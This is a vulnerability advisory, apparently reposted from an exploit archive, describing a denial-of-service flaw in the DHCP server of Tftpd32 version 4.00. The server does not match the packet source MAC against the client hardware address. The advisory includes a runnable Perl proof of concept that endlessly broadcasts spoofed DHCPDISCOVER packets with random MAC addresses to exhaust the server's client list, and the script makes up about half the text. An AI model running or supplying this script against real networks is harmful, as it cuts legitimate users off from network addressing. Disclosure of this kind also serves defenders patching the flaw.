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Tftpd32 DHCP Serve 4.00 Denial Of Service
Title: Tftpd32 DHCP Server Denial Of Service Vulnerability Software : Tftpd32 Software Version : v4.00 Vendor: http://tftpd32.jounin.net/ Vulnerability Published : 2012-05-21 Vulnerability Update Time : Status : Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P) Bug Description : Tftpd32 is a free tftp and dhcp server for windows, freeware tftp server. The tftpd32's dhcp server does not identify whether the real source mac address of dhcp discover packet is the same as client hardware address in payload of dhcp discover packet, so that attacker can makes evil dhcp discover packets to cram dhcp client list of the dhcp server, and then no one can gain ip address from the dhcp server. Solution : Like the other dhcp server, the tftpd32's dhcp server can drop the dhcp discover packet when it was detected the different between source mac address of dhcp discover packet and client hardware address in payload of dhcp discover packet. Proof Of Concept : ----------------------------------------------------------- #!/usr/bin/perl use IO::Socket::INET; use Net::DHCP::Packet; use Net::DHCP::Constants; $a=1; while(1){ print "\Request Number : $a\n"; $mac=int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)). int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)); $socket = IO::Socket::INET->new( Proto => 'udp', Broadcast => 1, LocalPort => 68, PeerAddr =>'255.255.255.255', PeerPort => 67, ) || die "Unable to create socket: $@\n"; $discover = Net::DHCP::Packet->new( xid => int rand(0xFFFFFFFF), Chaddr => $mac, DHO_DHCP_MESSAGE_TYPE() => DHCPDISCOVER(), DHO_VENDOR_CLASS_IDENTIFIER() => 'MyVendorClassID', DHO_DHCP_PARAMETER_REQUEST_LIST() => '1 2 6 12 15 28 67'); $discover->addOptionRaw( 61, pack('H*',$mac)); print "Sending DISCOVER to 255.255.255.255:67\n"; $socket->send( $discover->serialize() ) or die "Unable to send Discover:$!\n"; $socket->close(); sleep(3); $a++; } exit(1); ----------------------------------------------------------- Credits : This vulnerability was discovered by demonalex(at)163(dot)com mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk Pentester/Researcher Dark2S Security Team/PolyU.HK # 0day.today [2024-12-24] #